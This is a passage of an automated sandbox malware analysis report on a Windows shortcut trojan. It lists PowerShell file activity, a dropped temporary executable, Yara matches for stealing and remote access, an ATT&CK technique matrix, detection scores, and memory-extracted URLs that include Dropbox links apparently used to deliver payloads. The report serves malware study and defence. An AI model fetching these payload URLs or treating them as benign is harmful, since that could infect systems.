                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_0041C260 GetSystemTimeAsFileTime,SHFormatDateTimeW,22_2_0041C260
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 24_2_00419FF0 GetVersion,EnumWindows,IsWindow,SetForegroundWindow,SendMessageW,SendMessageW,SendMessageW,InitCommonControlsEx,CreateSolidBrush,EnumWindows,IsWindow,SetForegroundWindow,EnumWindows,IsWindow,SendMessageW,24_2_00419FF0
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: fontdrvhost.exe, 00000019.00000002.2762783406.00000000037F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpview.exe
                    Source: fontdrvhost.exe, 00000019.00000002.2762783406.00000000037F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Procmon.exe

                    Stealing of Sensitive Information

                    Source: Yara match File source: 00000018.00000003.2631329587.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000003.2641153235.00000000030A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000002.2758285950.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000018.00000002.2648884765.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    Source: Yara match File source: 00000018.00000003.2631329587.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000003.2641153235.00000000030A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000002.2758285950.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000018.00000002.2648884765.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 21 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                    Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Windows Service | 1 Windows Service | 3 Obfuscated Files or Information | Security Account Manager | 136 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 1 Registry Run Keys / Startup Folder | 111 Process Injection | 1 DLL Side-Loading | NTDS | 351 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | 3 PowerShell | Network Logon Script | 1 Registry Run Keys / Startup Folder | 11 Masquerading | LSA Secrets | 11 Process Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 41 Virtualization/Sandbox Evasion | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                    [Behavior graph] Behavior Graph ID: 1572661, Sample: qxjDerXRGR.lnk, Startdate: 10/12/2024, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label | Link
                    qxjDerXRGR.lnk | 21% | ReversingLabs | Win32.Trojan.Pantera |
                    qxjDerXRGR.lnk | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\111392827.exe | 26% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
                                                                      high
                                                                      https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com/cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtbpowershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.dropbox.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://anglebug.com/7714msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.dropbox.com/scl/fi/jpowershell.exe, 00000010.00000002.2459373881.0000028B004B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://anglebug.com/5430msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.docsend.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://permanently-removed.invalid/LogoutYxABzenmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.glarysoft.com/goto.php?a=upgradetopro&s=DiskDefrag340100134010023401003340100434010053401111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                    high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://uc48b83ada642288f62fac023367.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.dropboxstatic.com/static/powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://officeapps-df.live.compowershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://api.login.yahoo.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://office.net/msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com/cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJypowershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://anglebug.com/5281msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2324544978.000001BD83FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B0005E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://login.yahoo.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.dropbox.com/playlist/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://onedrive.live.com/pickerpowershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com/cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.dropbox.compowershell.exe, 00000002.00000002.2324544978.000001BD84395000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://anglebug.com/7369msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://anglebug.com/7489msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://anglebug.com/6878msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://chrome.google.com/webstoremsedge.exe, 00000005.00000002.2232649606.00003C100000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412695864.00001C4C0018C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
